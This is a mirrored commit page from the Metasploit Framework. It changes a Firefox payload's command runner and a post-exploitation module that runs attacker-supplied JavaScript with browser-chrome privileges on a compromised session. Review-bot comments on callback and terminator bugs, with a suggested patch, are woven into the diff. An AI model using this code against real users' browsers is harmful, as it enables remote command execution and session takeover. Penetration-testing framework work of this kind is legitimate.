mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
Use shell primitives instead of resorting to
echo hacks.
This commit is contained in:
parent
4329e5a21e
commit
f2f68a61aa
@ -47,7 +47,7 @@ module Msf::Payload::Firefox
# redirects stdout. A JScript "launch" file is dropped and invoked with wscript
# to run the command without displaying the cmd.exe prompt.
#
# When the command contains the pattern ",JAVASCRIPT, ... ,ENDSCRIPT,", the
# When the command contains the pattern "[JAVASCRIPT] ... [/JAVASCRIPT]", the
# javascript code between the tags is eval'd and returned.
#
# @return [String] javascript source code that exposes the runCmd(str) method.
@ -59,18 +59,12 @@ module Msf::Payload::Firefox
var svcs = Components.utils.import("resource://gre/modules/Services.jsm");
var jscript = (#{JSON.unparse({:src => jscript_launcher})}).src;
var runCmd = function(cmd, cb) {
var echo = function(str) {
if(!str \|\| !str.length) return '';
var e = str.match(/echo ['"]?([^;\\s"']+)/);
return (e && e[1]) \|\| '';
}
var js = (/,JAVASCRIPT,([\\s\\S]*),ENDSCRIPT,/g).exec(cmd.trim());
if (cmd.trim().length == 0) return;
var js = (/^\\s*\\[JAVASCRIPT\\]([\\s\\S]*)\\[\\/JAVASCRIPT\\]/g).exec(cmd.trim());
if (js) {
var wcmd = (windows) ? cmd+"\\n" : '';
var cmds = cmd.split(js[0]).map(function(s){return s.trim().replace(/^\\s*;/, "")});
Function('cb', js[1])(function(r) {
cb(wcmd+echo(cmds[0])+"\\n"+r+"\\n"+echo(cmds[1]))
})
var tag = "[!JAVASCRIPT]";
Function('send', js[1])(function(r){ if (r) cb(r+tag+"\\n"); });
return;
}
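Review bot: The callback handed to the script in `Function('send', js[1])(function(r){ if (r) cb(r+tag+"\\n"); });` forwards a reply only when r is truthy, so a script that sends an empty string, 0 or false never produces the `[!JAVASCRIPT]` terminator and the post module's shell_read_until_token call has to wait out its TIMEOUT. The filter does have to keep dropping undefined, because the post module also forwards the script's return value, which is undefined for scripts that reply later from a callback; `function(r){ if (r !== undefined) cb(r+tag+"\\n"); }` keeps that while still terminating empty replies. The doc comment in the first hunk still says the code between the tags is "eval'd and returned", which no longer describes the send-callback protocol; suggested wording: `# javascript code between the tags is run with a send(result) callback; whatever the script passes to send is written back, followed by the "[!JAVASCRIPT]" terminator the post module reads up to.` The terminator literal is repeated verbatim in the post module, so a short comment next to `var tag` noting that the two must stay in sync would help the next maintainer. runCmd's body continues past the end of this hunk.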
@ -35,7 +35,8 @@ class Metasploit3 < Msf::Post
end
def run
results = cmd_exec(",JAVASCRIPT,#{js_payload},ENDSCRIPT,", nil, datastore['TIMEOUT'])
session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
if results.present?
print_good results
@ -48,15 +49,15 @@ class Metasploit3 < Msf::Post
js = datastore['SCRIPT'].strip
%Q|
(function(){
(function(send){
var hiddenWindow = Components.classes["@mozilla.org/appshell/appShellService;1"]
.getService(Components.interfaces.nsIAppShellService)
.hiddenDOMWindow;
hiddenWindow.location = 'about:blank';
var src = (#{JSON.unparse({ :src => js })}).src;
var XHR = hiddenWindow.XMLHttpRequest;
var key = "#{Rex::Text.rand_text_alphanumeric(8+rand(12))}";
hiddenWindow[key] = true;
hiddenWindow.location = "#{datastore['URL']}";
@ -65,7 +66,11 @@ class Metasploit3 < Msf::Post
schedule(evt);
} else {
schedule(function(){
cb(hiddenWindow.Function(src)());
try {
send(hiddenWindow.Function('send', src)(send));
} catch (e) {
send("Error: "+e.message);
}
}, 500);
}
};
@ -77,7 +82,7 @@ class Metasploit3 < Msf::Post
};
schedule(evt);
})();
})(send);
|.strip
end
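Review bot: In the `schedule(function(){ ... }, 500)` hunk, `send(hiddenWindow.Function('send', src)(send))` hands send to the user script and also forwards the script's return value to it, so a SCRIPT that calls send(x) and then returns a truthy value answers twice; since runCmd appends a `[!JAVASCRIPT]` terminator to each reply, the second one presumably remains in the session stream after `shell_read_until_token` returns and would be consumed by the next read. A one-shot reply wrapper that ignores an undefined return value (the normal case for scripts that reply later, e.g. from an XHR callback) keeps it to one response per request, as sketched below. The catch branch now returns `"Error: "+e.message` as an ordinary result, and the visible `if results.present?` branch in run reports it with print_good; checking for that prefix in run and routing it to print_error would keep failures visible as failures. js_payload begins before this hunk (its `def` line is not shown) and ends in the section's last hunk.
```javascript
schedule(function(){
  // reply at most once; an undefined return value means the script calls send() itself later
  var done = false;
  var reply = function(r){ if (done) return; done = true; send(r); };
  try {
    var ret = hiddenWindow.Function('send', src)(reply);
    if (ret !== undefined) reply(ret);
  } catch (e) {
    reply("Error: "+e.message);
  }
}, 500);
```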